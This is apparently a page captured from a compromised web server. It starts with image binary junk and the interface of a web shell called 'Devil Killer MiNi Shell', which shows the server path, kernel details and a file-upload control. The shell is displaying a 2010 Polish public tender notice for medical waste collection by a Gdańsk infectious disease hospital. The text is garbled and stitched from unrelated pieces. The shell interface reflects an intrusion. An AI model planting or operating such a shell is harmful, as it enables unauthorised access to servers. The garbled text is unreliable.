JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100308/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100308/63326-N-2010.html

<p class="kh_header"><b>Gdańsk: Odbiór i unieszkodliwianie odpadów medycznych, w tym zakaźnych, wraz z transportem /ważeniem, załadunkiem i rozładunkiem/ z siedziby Zamawiającego w Gdańsku przy ul. Smoluchowskiego 18 (Usługi w zakresie odpadów medycznych /CPV 90524000-6/)</b><br>
<b>Numer ogłoszenia: 63326 - 2010; data zamieszczenia: 08.03.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Pomorskie Centrum Chorób Zakaźnych i Gruźlicy , ul. Smoluchowskiego 18, 80-214 Gdańsk, woj. pomorskie, tel. 058 3444440, faks 058 3444440.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.pcchz.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Odbiór i unieszkodliwianie odpadów medycznych, w tym zakaźnych, wraz z transportem /ważeniem, załadunkiem i rozładunkiem/ z siedziby Zamawiającego w Gdańsku przy ul. Smoluchowskiego 18 (Usługi w zakresie odpadów medycznych /CPV 90524000-6/).</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia jest odbiór i unieszkodliwianie odpadów medycznych, w tym zakaźnych, wraz z transportem /ważeniem, załadunkiem i rozładunkiem/ z siedziby Zamawiającego w Gdańsku przy ul. Smoluchowskiego 18 (Usługi w zakresie odpadów medycznych /CPV 90524000-6/) - odpady o następujących kodach kwalifikacyjnych:
1.1. Pakiet Nr 1 (medyczne odpady zakaźne),
a) 18 01 03 - inne odpady, które zawierają żywe drobnoustroje chorobotwórcze lub ich toksyny oraz inne formy zdolne do przeniesienia materiału genetycznego, o których wiadomo lub co do których istnieją wiarygodne podstawy do sądzenia, że wywołują choroby u ludzi i zwierząt (np. zainfekowane pieluchomajtki, podpaski, podkłady), z wyłączeniem 18 01 80 i 18 01 82,
b) 18 01 04 - inne odpady niż wymienione w 18 01 03 
c) 18 01 82 - pozostałości żywienia pacjentów oddziałów zakaźnych;
wraz z udostępnieniem na czas trwania umowy i ustawieniem w miejscu wskazanym przez Zamawiającego (w tym przygotowanie podłoża i podłączenie wymaganych instalacji) na magazynowane odpadów - zamykanego kontenera z układem chłodzącym i wagą, spełniającego wymagania § 6 pkt 2 i 3 rozporządzenia Ministra Zdrowia z dnia 23 sierpnia 2007 r. w sprawie szczegółowego sposobu postępowania z odpadami medycznymi (Dz.U.07.162.1153), a także wraz z usługą transportu obejmującą również ważenie odpadów przy odbiorze z miejsca ich magazynowania, załadunek i rozładunek dezynfekcją kontenera po każdorazowym odbiorze odpadów ,
1.2. Pakiet Nr 2, 
a) 18 01 09 - leki inne niż wymienione w 18 01 08.
2.Szczegółowy opis przedmiotu zamówienia, asortyment i ilość podano w załącznikach od nr 1.1.-1.2 do Specyfikacji, będących integralną częścią SIWZ.
3.Zakaźne odpady medyczne powinny być unieszkodliwiane na obszarze województwa, na którym zostały wytworzone lub w miejscach najbliżej położonych miejsca ich wytworzenia zgodnie z art. 9 ust. 5 i w sposób określony w art. 42 ustawy z dnia 27 kwietnia 2001 r. o odpadach (j.t. Dz.U. z 2007 r. Nr 39, poz. 251 z późn. zm.).
4.Usługa winna być wykonywana zgodnie z obowiązującymi przepisami, w szczególności przepisami ustawy Prawo  ochrony środowiska z dnia 27 kwietnia 2001 r. (j.t. Dz.U. z 2008 r. Nr  25, poz. 150 z późn. zm.), ustawy z dnia 27 kwietnia  2001 r. o odpadach (j.t. Dz.U. z 2007 r. Nr 39, poz. 251 z późn. zm.), ustawy z dnia 28 października 2002 r. o przewozie drogowym  towarów niebezpiecznych (Dz.U. z 2002 r. Nr 199, poz. 1671 z późn. zm).
5.Odbiór odpadów z placówki Zamawiającego winien być dokonywany  w ramach ceny oferty specjalistycznym środkiem transportu Wykonawcy, zgodnie z odpowiednimi przepisami. Czas magazynowania odpadów zakaźnych przy temperaturze przekraczającej 10 stopni C nie może przekraczać 48 godzin i w tym czasie należy je odebrać. Przy  temperaturze poniżej 10 stopni C, zakaźne odpady medyczne mogą być magazynowane tak długo jak pozwolą na to warunki składowania, ale nie dłużej niż 7 dni kalendarzowych (odbiór minimum 1 x w tygodniu), natomiast odbiór leków do unieszkodliwienia winien nastąpić w zależności od bieżących potrzeb Zamawiającego w terminie do 5 dni od daty zgłoszenia zapotrzebowania na unieszkodliwienie.
6.Okres realizacji całości zamówienia wynosi 24 miesiące, od chwili podpisania umowy.
7.Z uwagi na szacunkowe określenie ilości przedmiotu zamówienia, może ulec ona zmniejszeniu w zależności od potrzeb Zamawiającego. 
8.Zamawiający dopuszcza częściowe składanie ofert na dowolnie wybrany pakiet. Zamawiający nie dopuszcza częściowego składania oferty na poszczególne pozycje w zaproponowanym pakiecie.
9.Nie przewiduje się zamówień uzupełniających.
10.Zamawiający nie przewiduje zawarcia umowy ramowej.
11.Zamawiający nie przewiduje aukcji elektronicznej.
12.Postępowanie o udzielenie zamówienia publicznego prowadzone jest w trybie przetargu nieograniczonego, na podstawie ustawy z 29 stycznia 2004r. Prawo zamówień publicznych (jednolity tekst ustawy Dz.U. z 2007 r. Nr 223 poz. 1655 z późn. zm.), o wartości zamówienia powyżej 14.000 euro i nie przekraczającej kwoty określonej Rozporządzeniem Prezesa Rady Ministrów z dnia 23 grudnia 2009r. (Dz.U. Nr 224, poz. 1795) w sprawie kwot wartości zamówień oraz konkursów, od których jest uzależniony obowiązek przekazywania ogłoszeń Urzędowi Oficjalnych Publikacji Wspólnot Europejskich.
13.Ofertę należy sporządzić zgodnie ze Specyfikacją Istotnych Warunków Zamówienia. Formularz Specyfikacji Istotnych Warunków Zamówienia dostępny jest na stronie internetowej Zamawiającego lub w siedzibie Zamawiającego w Dziale Zamówień Publicznych Pomorskiego Centrum Chorób Zakaźnych i Gruźlicy w Gdańsku, ul. Smoluchowskiego 18, Gdańsk,  od poniedziałku do piątku w godz.  od 8:00 do 14:00 za opłatą w wysokości: 6,10  zł.
Pracownikami upoważnionymi do kontaktów z Wykonawcami od poniedziałku do piątku   w godz. od 8:00 do 14:00 są: 
- w sprawach merytorycznych (usług) :  Marcin Mikuła  tel.058/ 344-68-96,
- w sprawach formalnych (SIWZ): Lidia Sołowiej - Dział Zamówień Publicznych Pomorskiego Centrum Chorób Zakaźnych i Gruźlicy w Gdańsku,  tel./fax:  058 344-44-40,  341-40-41 wew. 232 , e-mail: zamowienia@pcchz.pl.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 90.52.40.00-6.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 24.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> W przedmiotowym postępowaniu o udzielenie zamówienia nie wymaga się wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się Wykonawcy spełniający następujący warunek:
posiadający uprawnienia do wykonywania działalności odbioru, transportu i unieszkodliwiana odpadów o kodach odpowiadających przedmiotowi zamówienia w ramach Pakietu, na który składana jest oferta w postaci aktualnego zezwolenia na prowadzenie działalności w zakresie odzysku i unieszkodliwiania odpadów o kodach odpowiadających przedmiotowi zamówienia lub odpowiedniego pozwolenia zintegrowanego, o którym mowa w przepisach o ochronie środowiska, a także aktualnego zezwolenia na transport odpadów o kodach odpowiadających przedmiotowi zamówienia, wydanych na podstawie ustawy z dnia 27 kwietnia 2001 r. o odpadach (Dz.U.z 2007 r. Nr 39, poz. 251 z późn. zm.).
Ocena spełnienia warunku nastąpi na podstawie przedstawionych przez Wykonawcę dokumentów:
- oświadczenie, że Wykonawca spełnia warunki  udziału w postępowaniu  -  według wzoru stanowiącego  załącznik nr 3 do SIWZ;
- aktualne zezwolenie na prowadzenie działalności w zakresie odzysku i unieszkodliwiania odpadów (lub odpowiednie pozwolenie zintegrowane, o którym mowa w przepisach o ochronie środowiska) o kodach odpowiadających przedmiotowi zamówienia w ramach Pakietu, na który składana jest oferta  i aktualne zezwolenie na transport tych odpadów wydane na podstawie ustawy z dnia 27 kwietnia 2001 r. o odpadach (j.t. Dz.U. z 2007 r. Nr 39, poz. 251 z późn. zm.);
Jeżeli Wykonawca złoży oświadczenie o spełnieniu warunku oraz przedłoży aktualne zezwolenie na prowadzenie działalności w zakresie odzysku i unieszkodliwiania odpadów (lub odpowiednie pozwolenie zintegrowane, o którym mowa w przepisach o ochronie środowiska) o kodach odpowiadających przedmiotowi zamówienia w ramach Pakietu, na który składana jest oferta  i aktualne zezwolenie na transport tych odpadów wydane na podstawie ustawy z dnia 27 kwietnia 2001 r. o odpadach (j.t. Dz.U. z 2007 r. Nr 39, poz. 251 z późn. zm.),- Zamawiający uzna warunek za spełniony.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się Wykonawcy spełniający następujący warunek:
dla Pakietu nr 1 - posiadający wiedzę i doświadczenie w postaci należytego wykonania, a w przypadku świadczeń okresowych lub ciągłych również wykonywania, co najmniej jednej usługi polegającej na odbiorze i unieszkodliwianiu medycznych odpadów zakaźnych o wartości nie mniejszej niż 200.000,00 zł brutto - w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia jest krótszy -  to w tym okresie.
Dla Pakietu nr 1 - ocena spełnienia warunku nastąpi  w oparciu o przedstawione przez Wykonawcę dokumenty: 
- oświadczenie, że Wykonawca spełnia warunki  udziału w postępowaniu  -  według wzoru stanowiącego  załącznik nr 3 do SIWZ;
- dla Pakietu nr 1 - oświadczenie - wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych usług polegających na odbiorze i unieszkodliwianiu medycznych odpadów zakaźnych o wartości nie mniejszej niż 200.000,00 zł brutto w okresie ostatnich trzech lat przed upływem do terminu składania ofert,  a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców oraz załączeniem dokumentu potwierdzającego, że  te usługi zostały wykonane lub są wykonywane należycie - wg wzoru stanowiącego załącznik nr 4 do SIWZ;
Jeżeli Wykonawca złoży oświadczenie o spełnieniu warunku  oraz wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych usług polegających na odbiorze i unieszkodliwianiu medycznych odpadów zakaźnych o wartości nie mniejszej niż 200.000,00 zł brutto w okresie ostatnich trzech lat przed upływem do terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców oraz załączeniem dokumentu potwierdzającego, że  te usługi zostały wykonane lub są wykonywane należycie - Zamawiający uzna warunek za spełniony; Jeżeli Wykonawca nie dysponuje zasobami niezbędnymi do realizacji niniejszego zamówienia, Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia. Ocena spełnienia warunku nastąpi w oparciu o pisemny dokument wystawiony przez podmiot oddający Wykonawcy do dyspozycji niezbędne zasoby na okres korzystania z nich przy wykonywaniu zamówienia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się Wykonawcy spełniający następujący warunek:
dysponujący odpowiednim potencjałem technicznym  do wykonania zamówienia - zapewniającymi  wykonanie zamówienia.
Ocena spełnienia warunku nastąpi w oparciu o przedstawione  przez Wykonawcę oświadczenie:
- oświadczenie, że Wykonawca spełnia warunki  udziału w postępowaniu  -  według wzoru stanowiącego  załącznik nr 3 do SIWZ;
Jeżeli  Wykonawca złoży  oświadczenie o spełnieniu warunku, Zamawiający uzna warunek za spełniony.  Jeżeli Wykonawca nie dysponuje zasobami niezbędnymi do realizacji niniejszego zamówienia, Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia. Ocena spełnienia warunku nastąpi w oparciu o pisemny dokument wystawiony przez podmiot oddający Wykonawcy do dyspozycji niezbędne zasoby na okres korzystania z nich przy wykonywaniu zamówienia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się Wykonawcy spełniający następujący warunek:
dysponujący odpowiednimi osobami zdolnymi do wykonania zamówienia - zapewniającymi  wykonanie zamówienia.
Ocena spełnienia warunku nastąpi w oparciu o przedstawione  przez Wykonawcę oświadczenie:
- oświadczenie, że Wykonawca spełnia warunki  udziału w postępowaniu  -  według wzoru stanowiącego  załącznik nr 3 do SIWZ;
Jeżeli  Wykonawca złoży  oświadczenie o spełnieniu warunku, Zamawiający uzna warunek za spełniony.  Jeżeli Wykonawca nie dysponuje zasobami niezbędnymi do realizacji niniejszego zamówienia, Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia. Ocena spełnienia warunku nastąpi w oparciu o pisemny dokument wystawiony przez podmiot oddający Wykonawcy do dyspozycji niezbędne zasoby na okres korzystania z nich przy wykonywaniu zamówienia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się Wykonawcy spełniający następujący warunek:
dla Pakietu nr 1 - posiadający sytuację ekonomiczną i finansową  zapewniającą  wykonanie zamówienia w postaci ubezpieczenia od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia, o wartości minimum 100.000,00 zł.
Dla pakietu nr 1 - ocena spełnienia warunku nastąpi na podstawie przedstawionych przez Wykonawcę dokumentów:
- oświadczenie, że Wykonawca spełnia warunki  udziału w postępowaniu  -  według wzoru stanowiącego  załącznik nr 3 do SIWZ;
- dla Pakietu nr 1 - opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia. o wartości minimum 100.000,00 zł.
Jeżeli Wykonawca złoży oświadczenie o spełnieniu warunku  oraz opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia o wartości minimum 100.000,00 zł -  Zamawiający uzna warunek za spełniony.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Wypełniony formularz ofertowo-cenowy - przygotowany zgodnie ze wzorem stanowiącym załącznik nr 1.1 lub 1.2.  do SIWZ, w zależności od Pakietu, na który składana jest oferta,
2.Wypełniony formularz ofertowy-oświadczenie ofertowe - przygotowane zgodnie ze wzorem stanowiącym załącznik nr 2 do SIWZ,
3.Pełnomocnictwo dla osoby, której prawo do reprezentacji nie wynika z dokumentów. Pełnomocnictwo musi być złożone w formie oryginału lub poświadczonej notarialnie kopii, sporządzonego przez notariusza odpisu lub wyciągu z dokumentu; treść pełnomocnictwa musi jednoznacznie określać czynności do wykonania których pełnomocnik jest upoważniony;
4.Dokument pełnomocnictwa pełnomocnika występującego w imieniu podmiotów ubiegających się o wspólne wykonanie zamówienia w przypadku składania oferty wspólnej; pełnomocnictwo musi być złożone w formie oryginału lub poświadczonej notarialnie kopii, sporządzonego przez notariusza odpisu lub wyciągu z dokumentu; treść pełnomocnictwa musi jednoznacznie określać czynności do wykonania których pełnomocnik jest upoważniony.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
